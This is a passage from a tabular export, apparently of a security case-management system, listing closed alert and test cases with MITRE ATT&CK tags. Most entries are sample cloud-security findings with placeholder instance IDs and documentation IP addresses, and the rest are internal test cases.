| U7HFQD      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_TIME_h_72dpi.jpg\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                              |              | Closed     |                                                      | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NQ7HJU      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ERX8GG      | Cydarm           | Amazon S3 Block Public Access was disabled for S3 bucket GeneratedFindingS3Bucket.                                                                                                                      |              | Closed     | test new depreacted                                  | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FHTSTC      | Cydarm           | new case                                                                                                                                                                                                |              | Closed     |                                                      | 2021-12-01 23:13:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JWGWRN      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZUSNRJ      | Cydarm           | DGA domain name queried by EC2 instance i-99999999.                                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 017FWX      | Cydarm           | Phishing attack                                                                                                                                                                                         |              | Closed     | mitre-attack:t1035-service_execution                 | 2021-12-01 04:32:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| R7JMLC      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_BEAKER_v.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                                  |              | Closed     |                                                      | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 4MWJVL      | Cydarm           | Principal IAMUser:GeneratedFindingUserName attempted to add a policy to themselves that is highly permissive.                                                                                           |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| XWF11L      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 660V5D      | Cydarm           | API GeneratedFindingAPIName was invoked from a remote host potentially running Parrot Security Linux.                                                                                                   |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 1ANEFN      | Cydarm           | new case 1                                                                                                                                                                                              |              | Closed     |                                                      | 2021-02-03 02:54:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZV3PCL      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| B3G6YA      | Cydarm           | gb test a case                                                                                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-03 02:14:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| EZW7HD      | Cydarm           | test case for ruth                                                                                                                                                                                      |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-11-30 06:58:00 |
|             |                  |                                                                                                                                                                                                         |              |            | data-breach                                          |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TBRQYV      | Cydarm           | Reconnaissance API GeneratedFindingAPIName was invoked from a known malicious IP address.                                                                                                               |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| MBTUJ9      | Cydarm           | tets contacts                                                                                                                                                                                           |              | Closed     |                                                      | 2021-02-04 14:02:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2W0AUF      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| RNED1U      | Cydarm           | API GeneratedFindingAPIName was invoked from a remote host potentially running Pentoo Linux.                                                                                                            |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 93GEGC      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NE5J5Z      | Cydarm           | eric test 6                                                                                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-20 23:41:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AD13FJ      | Cydarm           | Unusual user permission reconnaissance activity by GeneratedFindingUserName.                                                                                                                            |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 44LYTW      | Cydarm           | Ruth creates a test case in Chrome                                                                                                                                                                      |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-20 22:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 13DH74      | Cydarm           | TEST_Tristan_Linking cases & search                                                                                                                                                                     |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-01-25 04:02:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1211-exploitation_for_defense_evasion  |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 18FZJ9      | Cydarm           | Penteract CIT                                                                                                                                                                                           |              | Closed     |                                                      | 2021-03-11 13:32:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| S5WB3E      | Cydarm           | Unusual resource permission reconnaissance activity by GeneratedFindingUserName.                                                                                                                        |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FQ0172      | Cydarm           | EC2 Instance i-99999999 is performing a Windows Remote Management brute force attack against a remote host with the IP address 198.51.100.0.                                                            |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| F96ZDQ      | Cydarm           | cortex enrichment demo                                                                                                                                                                                  |              | Closed     |                                                      | 2021-02-03 02:23:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LNS0JN      | Cydarm           | test email                                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2022-02-02 15:00:00 |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1192-spearphishing_link                |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 9SG6V5      | Cydarm           | Reconnaissance API GeneratedFindingAPIName was invoked from a Tor exit node.                                                                                                                            |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FXCBES      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ND1BSE      | Cydarm           | Resource discovery API GeneratedFindingAPIName was invoked from a Tor exit node.                                                                                                                        |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2J9L66      | Cydarm           | eric test 4                                                                                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-20 23:39:00 |
|             |                  |                                                                                                                                                                                                         |              |            | test-tag                                             |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VHASPL      | Cydarm           | Unusual changes to API activity logging by GeneratedFindingUserName.                                                                                                                                    |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YBWBEF      | Cydarm           | Outbound portscan from EC2 instance i-99999999.                                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 6F15XS      | Cydarm           | 12 Test                                                                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 04:30:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YKA106      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:24:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZUP5KB      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:24:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PH5DEB      | Cydarm           | Eric test 10                                                                                                                                                                                            |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-20 23:55:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| XBLSZ8      | Cydarm           | AWS CloudTrail trail GeneratedFindingCloudTrailName was disabled.                                                                                                                                       |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| GW96C0      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 17:07:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QE6UA7      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NPNVCU      | Cydarm           | Markdown Test                                                                                                                                                                                           |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-01 00:39:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JNE87Q      | Cydarm           | OILRIG                                                                                                                                                                                                  |              | Closed     |                                                      | 2021-03-11 13:28:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| J26YBR      | Cydarm           | 0.8.12 Test - Create case test                                                                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-02-04 06:02:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 5PLFHF      | Cydarm           | API GeneratedFindingAPIName was invoked from an IP address on a custom threat list.                                                                                                                     |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SHS8WN      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2VCZLL      | Cydarm           | S3 API GeneratedFindingAPIName was invoked from known malicious IP address 198.51.100.0.                                                                                                                |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WTQ7BE      | Cydarm           | This is a test case                                                                                                                                                                                     |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-06-09 23:53:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LMSTAB      | Cydarm           | API GeneratedFindingAPIName was invoked from a known malicious IP address.                                                                                                                              |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QWA8WR      | Cydarm           | Unprotected port on EC2 instance i-99999999 is being probed.                                                                                                                                            |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| Q8641H      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| HRF3VA      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:24:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SNHF6H      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:24:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| Y6YNAL      | Cydarm           | email extract test                                                                                                                                                                                      |              | Closed     | mitre-attack:t1100-web_shell                         | 2022-01-23 00:36:00 |
|             |                  |                                                                                                                                                                                                         |              |            |                                                      |                     |
|             |                  |                                                                                                                                                                                                         |              |            | mitre-attack:t1192-spearphishing_link                |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A2BMGE      | Cydarm           | Principal GeneratedFindingUserName logged into the AWS Console from multiple countries recently.                                                                                                        |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WDY0NS      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 16:36:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JBHEFG      | Cydarm           | S3 API GeneratedFindingAPIName was invoked from known malicious IP address 198.51.100.0.                                                                                                                |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QKVUBR      | Cydarm           | Credentials for instance role GeneratedFindingUserName used from external IP address.                                                                                                                   |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WGCBQE      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FXB8LB      | Cydarm           | API GeneratedFindingAPIName was invoked from a remote host potentially running Kali Linux.                                                                                                              |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QGA0QN      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-10-04 06:55:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| B89MJU      | Cydarm           | Unusual console login was seen for principal GeneratedFindingUserName.                                                                                                                                  |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SZCWCY      | Cydarm           | eric test                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-20 22:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TGS7JX      | Cydarm           | 0.8.13 testing - Emergency STIX graph testing                                                                                                                                                           |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-09 04:29:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DRFT2A      | Cydarm           | Domain related to known abused domains queried by EC2 instance i-99999999.                                                                                                                              |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A9E3TQ      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| F0FB9B      | Cydarm           | MAR-10295134-1.v1.WHITE_2                                                                                                                                                                               |              | Closed     |                                                      | 2021-03-11 13:18:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 848EFL      | Cydarm           | stix stuff                                                                                                                                                                                              |              | Closed     |                                                      | 2022-02-03 02:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VB461A      | Cydarm           | Domain related to cryptocurrency queried by EC2 instance i-99999999.                                                                                                                                    |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A4FSPA      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LPU6RV      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-10-04 06:54:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VCJT2F      | Cydarm           | S3 API GeneratedFindingAPIName was invoked from known malicious IP address 198.51.100.0.                                                                                                                |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8M4AMS      | Cydarm           | API GeneratedFindingAPIName was invoked from a Tor exit node.                                                                                                                                           |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LH4XCL      | Cydarm           | test slack case                                                                                                                                                                                         |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-15 03:53:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 3Z8VBA      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 16:08:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 1S9XXF      | Cydarm           | ACSC-2020-003                                                                                                                                                                                           |              | Closed     |                                                      | 2021-03-11 13:13:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 1ML1JK      | Cydarm           | Unprotected EMR-related port on EC2 instance i-99999999 is being probed.                                                                                                                                |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| CR90SE      | Cydarm           | Domain related to known malicious domains queried by EC2 instance i-99999999.                                                                                                                           |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QJS44C      | Cydarm           | Phishing email                                                                                                                                                                                          |              | Closed     |                                                      | 2021-11-30 06:44:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PYZTJH      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| EB9ZWB      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in DefenseEvasion tactics.                                                                          |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FMHG5G      | Cydarm           | EC2 instance i-99999999 is behaving in a manner that may indicate it is being used to perform a Denial of Service \(DoS\) attack using UDP protocol.                                                    |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 72GTQD      | Cydarm           | email                                                                                                                                                                                                   |              | Closed     | mitre-attack:t1192-spearphishing_link                | 2022-02-02 15:08:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| S22JF1      | Cydarm           | Asset test                                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-05 11:29:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 9CKD0C      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-10-04 06:54:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NP8T8R      | Cydarm           | Domain similar to known malicious domains queried by EC2 instance i-99999999.                                                                                                                           |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 3GPR3L      | Cydarm           | Zeus                                                                                                                                                                                                    |              | Closed     | mitre-attack:t1491-defacement                        | 2022-01-31 02:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ECXREL      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 16:15:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8BY0NL      | Cydarm           | STIX shifter sample                                                                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 13:26:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VWZP11      | Cydarm           | Add case to group_Test case                                                                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-01-11 05:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| S4Z7AW      | Cydarm           | Blackholed domain name queried by EC2 instance i-99999999.                                                                                                                                              |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| X72XH6      | Cydarm           | EC2 instance i-99999999 is behaving in a manner that may indicate it is being used to perform a Denial of Service \(DoS\) attack using TCP protocol.                                                    |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 0M5PW9      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NTQBWJ      | Cydarm           | Drop Point domain name queried by EC2 instance i-99999999.                                                                                                                                              |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| QGJ8Y1      | Cydarm           | 198.51.100.0 is performing RDP brute force attacks against i-99999999.                                                                                                                                  |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| K4FQLE      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 08:26:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| S40B6M      | Cydarm           | Command and Control server domain name queried by EC2 instance i-99999999.                                                                                                                              |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 0CEE92      | Cydarm           | EC2 instance i-99999999 attempting connection to a blackholed IP Address.                                                                                                                               |              | Closed     |                                                      | 2021-03-11 15:58:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JDPWTN      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 16:21:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| Q23F3B      | Cydarm           | test123                                                                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-08-12 02:28:00 |
